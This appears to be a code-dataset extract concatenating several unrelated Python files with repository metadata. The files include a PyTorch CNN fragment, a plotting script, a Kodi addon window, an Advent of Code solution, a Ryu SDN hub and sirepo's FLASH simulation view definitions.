('conv6', nn.Conv2d(128, 256, kernel_size=(3, 3), dilation=(1, 1), bias=False)),
('norm6', nn.BatchNorm2d(256)), ('relu6', nn.ReLU(inplace=True)),
('conv7', nn.Conv2d(256, 256, kernel_size=(3, 3), dilation=(1, 2), bias=False)),
('norm7', nn.BatchNorm2d(256)), ('relu7', nn.ReLU(inplace=True)),
('pool7', nn.MaxPool2d((1, 2), stride=(1, 2), padding=(0, 1))),
('conv8', nn.Conv2d(256, 512, kernel_size=(3, 3), dilation=(1, 1), bias=False)),
('norm8', nn.BatchNorm2d(512)), ('relu8', nn.ReLU(inplace=True)),
('conv9', nn.Conv2d(512, 512, kernel_size=(3, 3), dilation=(1, 2), bias=False)),
('norm9', nn.BatchNorm2d(512)), ('relu9', nn.ReLU(inplace=True)),
]))
self.pool = nn.AdaptiveMaxPool2d((1, 1))
self.fc0 = nn.Linear(512, 300)
self.fc1 = nn.Linear(300, 10000)
def forward(self, x):
# input [N, C, H, W] (W = 396)
N = x.size()[0]
x = self.features(x) # [N, 512, 57, 2~15]
x = self.pool(x)
x = x.view(N, -1)
feature = self.fc0(x)
x = self.fc1(feature)
return x, feature
| 51.169811 | 106 | 0.54351 | 373 | 2,712 | 3.900804 | 0.268097 | 0.017869 | 0.068729 | 0.116838 | 0.305842 | 0.305842 | 0.276976 | 0.231615 | 0.231615 | 0.082474 | 0 | 0.114548 | 0.237094 | 2,712 | 52 | 107 | 52.153846 | 0.58869 | 0.01733 | 0 | 0 | 0 | 0 | 0.063862 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044444 | false | 0 | 0.111111 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2e72a8c6b707ef199bb8b6bf9f8aacf999cf31b | 562 | py | Python | tf-Faster-RCNN/Development/graphValid.py | concerttttt/RCNNs-on-Win64 | 603f46efcf9fb74eb0c0975e021ce2c7db184bb7 | [
"MIT"
] | 1 | 2017-09-02T12:35:39.000Z | 2017-09-02T12:35:39.000Z | tf-Faster-RCNN/Development/graphValid.py | concerttttt/RCNNs-on-Win64 | 603f46efcf9fb74eb0c0975e021ce2c7db184bb7 | [
"MIT"
] | null | null | null | tf-Faster-RCNN/Development/graphValid.py | concerttttt/RCNNs-on-Win64 | 603f46efcf9fb74eb0c0975e021ce2c7db184bb7 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Apr 28 14:03:45 2017
@author: kjl27
"""
import matplotlib.pyplot as plt
valid52_file = "../Logs/pascal_voc2007/Model52/VALID_Accuracy.txt"
valid54_file = "../Logs/pascal_voc2007/Model54/VALID_Accuracy.txt"
valid52 = []
valid54 = []
with open(valid52_file) as f:
for line in f:
valid52.append(float(line[-10:-2]))
with open(valid54_file) as f:
for line in f:
valid54.append(float(line[-10:-2]))
plt.plot(valid52)
plt.plot(valid54)
plt.show()
| 20.071429 | 66 | 0.647687 | 83 | 562 | 4.289157 | 0.554217 | 0.061798 | 0.078652 | 0.117978 | 0.196629 | 0.095506 | 0.095506 | 0 | 0 | 0 | 0 | 0.119469 | 0.19573 | 562 | 28 | 67 | 20.071429 | 0.668142 | 0.169039 | 0 | 0.142857 | 0 | 0 | 0.213508 | 0.213508 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.071429 | 0 | 0.071429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2e88ab1dfd6c0fedb4d0decef8fc6524826b59d | 1,234 | py | Python | ndsimulator/engines/read_dump.py | mir-group/NDSimulator | cf0dfbf030202a697dfc9c71f9a44200986638dd | [
"MIT"
] | null | null | null | ndsimulator/engines/read_dump.py | mir-group/NDSimulator | cf0dfbf030202a697dfc9c71f9a44200986638dd | [
"MIT"
] | null | null | null | ndsimulator/engines/read_dump.py | mir-group/NDSimulator | cf0dfbf030202a697dfc9c71f9a44200986638dd | [
"MIT"
] | null | null | null | import numpy as np
from ndsimulator.data import AllData
class ReadDump(AllData):
def __init__(
self,
root: str,
run_name: str,
run=None,
):
self.root = root
self.run_name = run_name
super(ReadDump, self).__init__(run)
def initialize(self, run):
AllData.__init__(self, run=run)
self.current_dt = self.dt
def begin(self):
self.load_data()
self.update(0, 0)
def load_data(self):
self._energy = np.loadtxt("{self.root}/{self.run_name}/energy.dat")
self._positions = np.loadtxt("{self.root}/{self.run_name}/pos.dat")
self._colv = np.loadtxt("{self.root}/{self.run_name}/colvar.dat")
if self._energy.shape[1] > 7:
self._bias = True
else:
self._bias = False
def update(self, step, time):
atoms = self.atoms
atoms.positions = self._positions[step, :]
atoms.colv = self._colv[step, :]
(
self.current_dt,
atoms.T,
atoms.pe,
atoms.ke,
atoms.biase,
atoms.totale,
) = self._energy[step, 1:7]
if self._bias:
pass
return True
| 25.183673 | 75 | 0.540519 | 151 | 1,234 | 4.205298 | 0.337748 | 0.066142 | 0.069291 | 0.094488 | 0.132283 | 0.132283 | 0.132283 | 0 | 0 | 0 | 0 | 0.007335 | 0.337115 | 1,234 | 48 | 76 | 25.708333 | 0.768949 | 0 | 0 | 0 | 0 | 0 | 0.089951 | 0.089951 | 0 | 0 | 0 | 0 | 0 | 1 | 0.121951 | false | 0.02439 | 0.04878 | 0 | 0.219512 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2ec3c4738f439924114446b934a66b0a66dd359 | 678 | py | Python | .kodi/addons/script.module.axel.downloader/controlpanel.py | C6SUMMER/allinclusive-kodi-pi | 8baf247c79526849c640c6e56ca57a708a65bd11 | [
"Apache-2.0"
] | null | null | null | .kodi/addons/script.module.axel.downloader/controlpanel.py | C6SUMMER/allinclusive-kodi-pi | 8baf247c79526849c640c6e56ca57a708a65bd11 | [
"Apache-2.0"
] | null | null | null | .kodi/addons/script.module.axel.downloader/controlpanel.py | C6SUMMER/allinclusive-kodi-pi | 8baf247c79526849c640c6e56ca57a708a65bd11 | [
"Apache-2.0"
] | 2 | 2018-04-17T17:34:39.000Z | 2020-07-26T03:43:33.000Z | import xbmc, xbmcgui
#get actioncodes from https://github.com/xbmc/xbmc/blob/master/xbmc/guilib/Key.h
ACTION_PREVIOUS_MENU = 10
ACTION_SELECT_ITEM = 7
class MyClass(xbmcgui.Window):
def __init__(self):
self.strActionInfo = xbmcgui.ControlLabel(100, 120, 800, 400, '', 'font13', '0xFFFF00FF')
self.addControl(self.strActionInfo)
self.strActionInfo.setLabel('More options here to control the Download Manager, please any key to close')
def onAction(self, action):
self.close()
def message(self, message):
dialog = xbmcgui.Dialog()
dialog.ok("Byebye!", message)
mydisplay = MyClass()
mydisplay .doModal()
del mydisplay | 30.818182 | 110 | 0.705015 | 85 | 678 | 5.529412 | 0.658824 | 0.108511 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035907 | 0.178466 | 678 | 22 | 111 | 30.818182 | 0.807899 | 0.116519 | 0 | 0 | 0 | 0 | 0.16782 | 0 | 0 | 0 | 0.017301 | 0 | 0 | 1 | 0.1875 | false | 0 | 0.0625 | 0 | 0.3125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2ed8af9cf95e6636dde197311f06fce010f70d7 | 514 | py | Python | settings.py | juniorpedroso/My-Rocket | b2235329b0a90e939cf245f9aa309d3af79f2f77 | [
"MIT"
] | null | null | null | settings.py | juniorpedroso/My-Rocket | b2235329b0a90e939cf245f9aa309d3af79f2f77 | [
"MIT"
] | null | null | null | settings.py | juniorpedroso/My-Rocket | b2235329b0a90e939cf245f9aa309d3af79f2f77 | [
"MIT"
] | null | null | null | vermelho = (255, 0, 0)
verde = (0, 255, 0)
azul = (0, 0, 255)
cinza = (230, 230, 230)
cinzaescuro = (128, 128, 128)
class Settings():
"""[Uma classe para armazenar todas as configurações de
My Rocket.]
"""
def __init__(self):
"""[Inicializa as configurações do jogo]
"""
# Configuração da tela
self.screen_width = 600
self.screen_height = 400
self.bg_color = cinzaescuro
# Configurações do foguete
self.rocket_speed_factor = 0.5
| 22.347826 | 60 | 0.59144 | 64 | 514 | 4.609375 | 0.640625 | 0.027119 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.112948 | 0.293774 | 514 | 22 | 61 | 23.363636 | 0.699725 | 0.309339 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2ef46dad8e30bcb6e31ba7c2d5dcf099bc6aee7 | 1,426 | py | Python | adventofcode/solutions/y2020/d23_linked_list.py | codertee/adventofcode | a2f07d947815212afabf6eeca31f112b9fdf39ca | [
"BSD-3-Clause"
] | 2 | 2020-12-10T22:29:56.000Z | 2020-12-22T01:57:28.000Z | adventofcode/solutions/y2020/d23_linked_list.py | codertee/adventofcode | a2f07d947815212afabf6eeca31f112b9fdf39ca | [
"BSD-3-Clause"
] | null | null | null | adventofcode/solutions/y2020/d23_linked_list.py | codertee/adventofcode | a2f07d947815212afabf6eeca31f112b9fdf39ca | [
"BSD-3-Clause"
] | 2 | 2020-12-18T04:05:50.000Z | 2020-12-21T14:25:10.000Z | from adventofcode.inputs import get_input
from adventofcode.utils import aoc_timer
class Cup:
__slots__ = ('v', 'n')
def __init__(self, val, next_cup=None):
self.v = val
self.n = next_cup
def play(cups: list, turns=100):
max_val = max(cups)
cup = None
cups_map = [None] * (max_val + 1)
for val in cups[::-1]:
cup = cups_map[val] = Cup(val, cup)
current = cups_map[cups[-1]].n = cup
for _ in range(turns):
one = current.n
two = one.n
three = two.n
selected = current.v - 1
while selected in (one.v, two.v, three.v, 0):
selected = selected - 1 if selected > 0 else max_val
selected = cups_map[selected]
current.n = three.n
three.n = selected.n
selected.n = one
current = current.n
return cups_map[1]
@aoc_timer(1, 23, 2020)
def solve_first(cups):
cup = play(cups)
res = ''
for _ in range(len(cups) - 1):
cup = cup.n
res += str(cup.v)
return res
@aoc_timer(2, 23, 2020)
def solve_second(cups):
low, high = max(cups) + 1, 1000001
cups += list(range(low, high))
cup = play(cups, 10000000)
return cup.n.v * cup.n.n.v
def parse_input(input_str):
return list(map(int, input_str.strip()))
if __name__ == '__main__':
cups = parse_input(get_input(23, year=2020))
solve_first(cups)
solve_second(cups)
| 23.377049 | 64 | 0.584151 | 215 | 1,426 | 3.683721 | 0.27907 | 0.044192 | 0.020202 | 0.035354 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.047244 | 0.287518 | 1,426 | 60 | 65 | 23.766667 | 0.732283 | 0 | 0 | 0 | 0 | 0 | 0.007013 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.106383 | false | 0 | 0.042553 | 0.021277 | 0.276596 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2f058557fa5bf7c30301c20247e9518b4078896 | 1,210 | py | Python | Chapter10/chapter10_2.py | dimjay/Mastering-Python-Networking | 7d167aeb821718a6f24b65bffe539765cf98293f | [
"MIT"
] | 107 | 2017-03-31T09:39:47.000Z | 2022-01-10T17:43:12.000Z | Chapter10/chapter10_2.py | dimjay/Mastering-Python-Networking | 7d167aeb821718a6f24b65bffe539765cf98293f | [
"MIT"
] | 2 | 2021-03-20T05:31:10.000Z | 2022-03-08T21:11:02.000Z | Chapter10/chapter10_2.py | dimjay/Mastering-Python-Networking | 7d167aeb821718a6f24b65bffe539765cf98293f | [
"MIT"
] | 98 | 2017-02-25T17:55:43.000Z | 2022-02-20T19:06:06.000Z | # Referenced from ryu/ryu/app/simple_switch_13.py
from ryu.base import app_manager
from ryu.controller import ofp_event
from ryu.controller.handler import CONFIG_DISPATCHER, MAIN_DISPATCHER
from ryu.controller.handler import set_ev_cls
from ryu.ofproto import ofproto_v1_3, ofproto_v1_0
class SimpleHub(app_manager.RyuApp):
OFP_VERSIONS = [ofproto_v1_0.OFP_VERSION]
#OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]
def __init__(self, *args, **kwargs):
super(SimpleHub, self).__init__(*args, **kwargs)
@set_ev_cls(ofp_event.EventOFPSwitchFeatures, CONFIG_DISPATCHER)
def switch_features_handler(self, ev):
message = ev.msg
print("message: ", message)
@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def packet_in_handler(self, ev):
msg = ev.msg
print("ev message: ", ev.msg)
datapath = msg.datapath
ofproto = datapath.ofproto
ofp_parser = datapath.ofproto_parser
actions = [ofp_parser.OFPActionOutput(ofproto.OFPP_FLOOD)]
out = ofp_parser.OFPPacketOut(
datapath=datapath, buffer_id=msg.buffer_id, in_port=msg.in_port,
actions=actions)
datapath.send_msg(out)
| 31.842105 | 76 | 0.716529 | 160 | 1,210 | 5.1 | 0.35 | 0.051471 | 0.0625 | 0.058824 | 0.112745 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010246 | 0.193388 | 1,210 | 37 | 77 | 32.702703 | 0.82582 | 0.072727 | 0 | 0 | 0 | 0 | 0.018817 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.12 | false | 0 | 0.2 | 0 | 0.4 | 0.08 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2f0df3d2b0b35ab406a052f5970cc062ed892cd | 27,201 | py | Python | sirepo/template/flash_views.py | mkeilman/sirepo | 29ac632f688b019c95d69191a84848f263433dd7 | [
"Apache-2.0"
] | 49 | 2015-07-29T14:11:29.000Z | 2021-12-10T15:24:26.000Z | sirepo/template/flash_views.py | mkeilman/sirepo | 29ac632f688b019c95d69191a84848f263433dd7 | [
"Apache-2.0"
] | 3,732 | 2015-08-03T22:07:26.000Z | 2022-03-31T22:48:33.000Z | sirepo/template/flash_views.py | mkeilman/sirepo | 29ac632f688b019c95d69191a84848f263433dd7 | [
"Apache-2.0"
] | 28 | 2015-11-20T16:23:46.000Z | 2021-09-20T07:22:48.000Z | # -*- coding: utf-8 -*-
u"""Flash Config parser.
:copyright: Copyright (c) 2021 RadiaSoft LLC. All Rights Reserved.
:license: http://www.apache.org/licenses/LICENSE-2.0.html
"""
from pykern import pkio
from pykern.pkcollections import PKDict
from pykern.pkdebug import pkdc, pkdp, pkdlog
import inspect
import re
def _fields(templates, values):
# template: [field template, label template]
# values: values to insert into the field/label templates
return {
t[0].format(v): t[1].format(v.upper()) for v in values for t in templates
}
class SpecializedViews:
# POSIT: FLASH field names are unique so flat list is ok
_LABELS = PKDict(
LimitedSlopeBeta='Limited Slope Beta',
RiemannSolver='Riemann Solver',
UnitSystem='System of Units',
allowDtSTSDominate='allowDtSTSDominate',
cfl='Courant Factor',
charLimiting='Characteristic Limiting',
cvisc='Artificial Viscosity Constant',
diff_eleFlCoef='Flux Limiter Coefficient',
diff_eleXlBoundaryType='X Left Boundary',
diff_eleXrBoundaryType='X Right Boundary',
diff_eleYlBoundaryType='Y Left Boundary',
diff_eleYrBoundaryType='Y Right Boundary',
diff_eleZlBoundaryType='Z Left Boundary',
diff_eleZrBoundaryType='Z Right Boundary',
diff_thetaImplct='Implicitness Factor',
diff_useEleCond='Use Ele Conduction',
dt_diff_factor='Timestep Factor',
dtinit='Initial Timestep [s]',
dtmax='Maximum Timestep',
dtmin='Minimum Timestep',
ed_crossSectionFunctionType_1='Cross Section Function Type',
ed_gaussianCenterMajor_1='Major Gaussian Center',
ed_gaussianCenterMinor_1='Minor Gaussian Center',
ed_gaussianExponent_1='Gaussian Exponent',
ed_gaussianRadiusMajor_1='Major Gaussian Radius',
ed_gaussianRadiusMinor_1='Minor Gaussian Radius',
ed_gradOrder='Gradient Order',
ed_gridType_1='Type of Beam Grid',
ed_laser3Din2D='3D Ray Tracing',
ed_laser3Din2DwedgeAngle='Wedge Angle',
ed_laserIOMaxNumberOfPositions='Max Ray Positions',
ed_laserIOMaxNumberOfRays='Max Rays',
ed_lensSemiAxisMajor_1='Lens Semi Axis Major',
ed_lensX_1='Lens X',
ed_lensY_1='Lens Y',
ed_lensZ_1='Lens Z',
ed_maxRayCount='Max Ray Count',
ed_numberOfBeams='Number of Beams',
ed_numberOfPulses='Number of Pulses',
ed_numberOfRays_1='Number of Rays',
ed_numberOfSections_1='Number of Sections',
ed_power_1_1='Laser Pulse Section 1',
ed_power_1_2='Laser Pulse Section 2',
ed_power_1_3='Laser Pulse Section 3',
ed_power_1_4='Laser Pulse Section 4',
ed_pulseNumber_1='Pulse Number',
ed_semiAxisMajorTorsionAngle_1='Major Semiaxis Torsion Angle',
ed_semiAxisMajorTorsionAxis_1='Major Semiaxis Torsion Axis',
ed_targetSemiAxisMajor_1='Major Target Semiaxis',
ed_targetSemiAxisMinor_1='Minor Target Semiaxis',
ed_targetX_1='X Target',
ed_targetY_1='Y Target',
ed_targetZ_1='Z Target',
ed_time_1_1='Laser Pulse Section 1',
ed_time_1_2='Laser Pulse Section 2',
ed_time_1_3='Laser Pulse Section 3',
ed_time_1_4='Laser Pulse Section 4',
ed_useLaserIO='Use Laser IO',
ed_wavelength_1='Wavelength',
entropy='Entropy Fix',
eosMode='Eos Mode',
eosModeInit='Initial Eos Mode',
fl_b='Flame Width',
fl_epsilon_0='Lower Sharpening Factor',
fl_epsilon_1='Upper Sharpening Factor',
fl_fsConstFlameSpeed='Constant Flame Speed',
fl_kpp_fact='Prefactor Adjustment',
flame_deltae='Flame Delta e',
gconst='Acceleration Constant',
gdirec='Direction of Acceleration',
geometry='Grid Geometry',
grav_boundary_type='Boundary Condition',
lrefine_max='Maximum Refinement Level',
lrefine_min='Minimum Refinement Level',
order='Order',
plotFileIntervalTime='Plot File Interval Time [s]',
refine_var_count='Refine Variable Count',
rt_dtFactor='Time Step Coefficient',
rt_mgdBounds_1='Boundary 1',
rt_mgdBounds_2='Boundary 2',
rt_mgdBounds_3='Boundary 3',
rt_mgdBounds_4='Boundary 4',
rt_mgdBounds_5='Boundary 5',
rt_mgdBounds_6='Boundary 6',
rt_mgdBounds_7='Boundary 7',
rt_mgdFlCoef='MGD Flux Limiter Coefficient',
rt_mgdFlMode='MGD Glux Limiter Mode',
rt_mgdNumGroups='Number of Groups',
rt_mgdXlBoundaryType='X MGD Left Boundary',
rt_mgdXrBoundaryType='X MGD Right Boundary',
rt_mgdYlBoundaryType='Y MGD Left Boundary',
rt_mgdYrBoundaryType='Y MGD Right Boundary',
rt_mgdZlBoundaryType='Z MGD Left Boundary',
rt_mgdZrBoundaryType='Z MGD Right Boundary',
rt_useMGD='Use Multigroup Radiation Diffusion',
shockDetect='Use Strong Compressive Shock Detection',
slopeLimiter='Slope Limiter',
sumyi_burned='Burned sumyi',
sumyi_unburned='Unburned sumyi',
threadHydroBlockList='Block List Threading',
threadHydroWithinBlock='Within Block Threading',
tmax='Maximum Simulation Time [s]',
updateHydroFluxes='Update Hydro Fluxes',
useDiffuse='Use Diffusive Effects',
useEnergyDeposition='Use Energy Deposition',
useFlame='Use Flame',
useGravity='Use Gravity',
useHydro='Use Hydro Calculation',
useRadTrans='Use Radiative Transfer',
use_cma_advection='Use CMA Advection',
use_cma_flattening='Use CMA Flattening',
ye_burned='Burned ye',
ye_unburned='Unburned ye',
**_fields([
['{}l_boundary_type', '{} Lower Boundary Type'],
['{}r_boundary_type', '{} Upper Boundary Type'],
['{}min', '{} Minimum'],
['{}max', '{} Maximum'],
['nblock{}', 'Blocks in {}'],
], ['x', 'y', 'z']),
**_fields([
['refine_var_{}', 'Name Variable {}'],
['refine_cutoff_{}', 'Refine Variable {}'],
['derefine_cutoff_{}', 'Derefine Variable {}'],
], [str(v) for v in range(1, 7)]),
)
_VIEW_FUNC_PREFIX = '_view_'
def __init__(self):
self._view_fns = PKDict()
for n, o in inspect.getmembers(self):
if n.startswith(self._VIEW_FUNC_PREFIX) and inspect.ismethod(o):
self._view_fns[n[len(self._VIEW_FUNC_PREFIX):]] = o
def update_schema(self, schema):
self._update_labels(schema)
self._update_views(schema)
return schema
def _assert_model_view_fields_exist(self, name, view, schema):
"""Check that model fields in view exist in models"""
def flatten(to_flatten):
def flatten_column(to_flatten):
if isinstance(to_flatten[0], str):
return flatten(to_flatten[1])
res = []
for f in to_flatten:
res += flatten_column(f)
return res
res = []
for f in to_flatten:
if isinstance(f, str):
res.append(f)
continue
assert isinstance(f, list), \
'uknown type f={f}'
res += flatten_column(f)
return res
for f in flatten(view.get('basic', []) + view.get('advanced', [])):
if '.' not in f:
f = f'{name}.{f}'
p = f.split('.')
assert p[0] in schema.model, \
f'model name={p[0]} does not exist in known models={schema.model.keys()}'
assert p[1] in schema.model[p[0]], \
f'field={p[1]} does not exist in model={schema.model[p[0]]} name={p[0]}'
def _get_species_list(self, schema):
res = []
for f in schema.model.Multispecies_MultispeciesMain:
m = re.search(r'eos_(.*)EosType', f)
if m:
res.append(m.group(1))
return res
def _update_labels(self, schema):
labels = self._LABELS.copy()
self._update_sim_labels(schema, labels)
self._update_multispecies_labels(schema, labels)
for m in schema.model.values():
for f in m:
if f not in labels:
continue
info = m[f]
if len(info) == 3:
info.append(f)
elif info[3]:
info[3] = '{} {}'.format(f, info[3])
else:
info[3] = f
info[0] = labels[f]
def _update_multispecies_labels(self, schema, labels):
if 'Multispecies_MultispeciesMain' not in schema.model:
return
for s in self._get_species_list(schema):
for f, label in {
'ms_{}A': 'Number of protons and neutrons in nucleus',
'ms_{}Z': 'Atomic number',
'ms_{}ZMin': 'Minimum allowed average ionization',
'eos_{}EosType': 'EOS type to use for MTMMMT EOS',
'eos_{}SubType': 'EOS subtype to use for MTMMMT EOS',
'ms_{}Gamma': 'Ratio of heat capacities',
'eos_{}TableFile': 'Tabulated EOS file name',
'op_{}Absorb': 'Absorption',
'op_{}Emiss': 'Emission',
'op_{}Trans': 'Transport',
}.items():
labels[f.format(s)] = f'{s.title()} {label}'
def _update_sim_labels(self, schema, labels):
#TODO(pjm): use constant for flashApp model
# special case for main simulation labels - use full description as label
for f, info in schema.model.Simulation_SimulationMain_flashApp.items():
if len(info) > 3:
labels[f] = info[3]
info[3] = ''
def _update_views(self, schema):
for n, f in self._view_fns.items():
if n not in schema.view:
continue
v = f(schema)
if v:
self._assert_model_view_fields_exist(n, v, schema)
schema.view[n].update(v)
def _view_Driver_DriverMain(self, schema):
# http://flash.uchicago.edu/site/flashcode/user_support/rpDoc_4p2.py?submit=rp_Driver.txt
v = PKDict(
title='Simulation Driver',
advanced=[
['Driver', [
'dr_abortPause',
'dr_dtMinBelowAction',
'dr_dtMinContinue',
'dr_numPosdefVars',
'dr_posdefDtFactor',
'dr_posdefVar_1',
'dr_posdefVar_2',
'dr_posdefVar_3',
'dr_posdefVar_4',
'dr_printTStepLoc',
'dr_shortenLastStepBeforeTMax',
'dr_tstepSlowStartFactor',
'dr_usePosdefComputeDt',
]],
['Drift', [
'drift_break_inst',
'drift_trunc_mantissa',
'drift_tuples',
'drift_verbose_inst',
]],
['Time', [
'wall_clock_time_limit',
'tinitial',
]],
['Timestep', [
'tstep_change_factor',
'nbegin',
'nend',
'useSTS',
'useSTSforDiffusion',
'nuSTS',
'nstepTotalSTS',
]],
['Thread', [
'threadBlockListBuild',
'threadDriverBlockList',
'threadDriverWithinBlock',
'threadRayTraceBuild',
'threadWithinBlockBuild',
]],
['Redshift', [
'zInitial',
'zFinal',
]],
['Other', [
'meshCopyCount',
'sweepOrder',
]],
],
basic=[
'dtinit',
'tmax',
'dtmax',
'dtmin',
'allowDtSTSDominate',
],
)
if 'IO_IOMain' in schema.model:
v.basic.append('IO_IOMain.plotFileIntervalTime')
return v
def _view_physics_Diffuse_DiffuseMain(self, schema):
# http://flash.uchicago.edu/site/flashcode/user_support/rpDoc_4p2.py?submit=rp_Diffuse.txt
v = PKDict(
title='Diffusive Effects',
basic=[
'diff_eleFlMode',
'diff_eleFlCoef',
'dt_diff_factor',
[
['X', [
'diff_eleXlBoundaryType',
'diff_eleXrBoundaryType',
]],
['Y', [
'diff_eleYlBoundaryType',
'diff_eleYrBoundaryType',
]],
['Z', [
'diff_eleZlBoundaryType',
'diff_eleZrBoundaryType',
]]
]
],
)
if 'physics_Diffuse_DiffuseMain_Unsplit' in schema.model:
v.basic.insert(3, 'physics_Diffuse_DiffuseMain_Unsplit.diff_thetaImplct')
if 'physics_Diffuse_DiffuseMain' in schema.model :
v.basic.insert(0, 'physics_Diffuse_DiffuseMain.diff_useEleCond')
v.basic.insert(0, 'physics_Diffuse_DiffuseMain.useDiffuse')
return v
def _view_physics_Gravity_GravityMain(self, schema):
# http://flash.uchicago.edu/site/flashcode/user_support/rpDoc_4p2.py?submit=rp_Gravity.txt
v = PKDict(
basic=[
'useGravity',
],
)
if 'physics_Gravity' in schema.model:
# Flash docs seem to be wrong. useGravity does not exist in
# physics/Gravity. Just physics/Gravity/GravityMain
v.basic.insert(1, 'physics_Gravity.grav_boundary_type')
if 'physics_Gravity_GravityMain_Constant' in schema.model:
v.basic.extend([
'physics_Gravity_GravityMain_Constant.gconst',
'physics_Gravity_GravityMain_Constant.gdirec',
])
return v
def _view_Grid_GridMain(self, schema):
# http://flash.uchicago.edu/site/flashcode/user_support/rpDoc_4p2.py?submit=rp_Grid.txt
v = PKDict(
title='Grid',
basic=[
['Main', [
'geometry',
'eosModeInit',
'eosMode',
[
['X', [
'xl_boundary_type',
'xr_boundary_type',
'xmin',
'xmax'
]],
['Y', [
'yl_boundary_type',
'yr_boundary_type',
'ymin',
'ymax'
]],
['Z', [
'zl_boundary_type',
'zr_boundary_type',
'zmin',
'zmax'
]]
]
]],
],
)
if 'Grid_GridMain_paramesh' in schema.model:
v.basic.append(
['Paramesh', [
'Grid_GridMain_paramesh.nblockx',
'Grid_GridMain_paramesh.nblocky',
'Grid_GridMain_paramesh.nblockz',
'Grid_GridMain_paramesh.lrefine_min',
'Grid_GridMain_paramesh.lrefine_max',
'Grid_GridMain_paramesh.refine_var_count',
[
['Name', [
'Grid_GridMain_paramesh.refine_var_1',
'Grid_GridMain_paramesh.refine_var_2',
'Grid_GridMain_paramesh.refine_var_3',
'Grid_GridMain_paramesh.refine_var_4'
]],
['Refine Cutoff', [
'Grid_GridMain_paramesh.refine_cutoff_1',
'Grid_GridMain_paramesh.refine_cutoff_2',
'Grid_GridMain_paramesh.refine_cutoff_3',
'Grid_GridMain_paramesh.refine_cutoff_4'
]],
['Derefine Cutoff', [
'Grid_GridMain_paramesh.derefine_cutoff_1',
'Grid_GridMain_paramesh.derefine_cutoff_2',
'Grid_GridMain_paramesh.derefine_cutoff_3',
'Grid_GridMain_paramesh.derefine_cutoff_4'
]],
],
]],
)
return v
def _view_physics_Hydro_HydroMain(self, schema):
# http://flash.uchicago.edu/site/flashcode/user_support/rpDoc_4p2.py?submit=rp_Hydro.txt
v = PKDict(
title='Hydrodynamics',
basic=[
'useHydro',
'cfl',
],
fieldsPerTab=10,
)
if 'physics_Hydro_HydroMain_unsplit' in schema.model:
v.basic.extend([
'physics_Hydro_HydroMain_unsplit.order',
'physics_Hydro_HydroMain_unsplit.slopeLimiter',
'physics_Hydro_HydroMain_unsplit.LimitedSlopeBeta',
'physics_Hydro_HydroMain_unsplit.charLimiting',
'physics_Hydro_HydroMain_unsplit.cvisc',
'physics_Hydro_HydroMain_unsplit.RiemannSolver',
'physics_Hydro_HydroMain_unsplit.entropy',
'physics_Hydro_HydroMain_unsplit.shockDetect'
])
return v
def _view_physics_materialProperties_Opacity_OpacityMain_Multispecies(self, schema):
v = PKDict(
title='Material Properties',
basic=[]
)
if 'physics_materialProperties_Opacity_OpacityMain' in schema.model:
v.basic.append('physics_materialProperties_Opacity_OpacityMain.useOpacity')
if 'physics_materialProperties_Conductivity_ConductivityMain' in schema.model:
v.basic.append('physics_materialProperties_Conductivity_ConductivityMain.useConductivity')
if 'physics_materialProperties_MagneticResistivity_MagneticResistivityMain' in schema.model:
